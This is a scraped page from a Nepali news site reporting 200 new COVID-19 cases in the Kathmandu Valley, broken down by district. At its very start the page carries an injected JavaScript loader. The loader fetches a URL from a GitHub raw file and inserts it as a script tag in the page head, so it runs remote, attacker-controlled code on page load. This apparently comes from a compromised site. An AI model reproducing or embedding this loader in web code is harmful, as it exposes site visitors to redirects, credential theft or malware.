;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौं उपत्यकामा २०० जना कोरोना संक्रमित थपिए – जुनेली न्युज
सोमवार, असार ३१, २०८२
  • होमपेज
  • काठमाडौं उपत्यकामा २०० जना कोरोना संक्रमित थपिए
समाचार

काठमाडौं उपत्यकामा २०० जना कोरोना संक्रमित थपिए

कोरोना

भदौ ४

काठमाडौं । पछिल्लो २४ घण्टामा काठमाडौं उपत्यकामा २ सय जना कोरोना संक्रमित थपिएका छन् । स्वास्थ्य तथा जनसंख्या मन्त्रालयका अनुसार काठमाडौं जिल्लामा १७४, ललितपुरमा १८ र भक्तपुरमा ८ जना संक्रमित भेटिएका छन् ।

फेसबुक प्रतिक्रियाहरु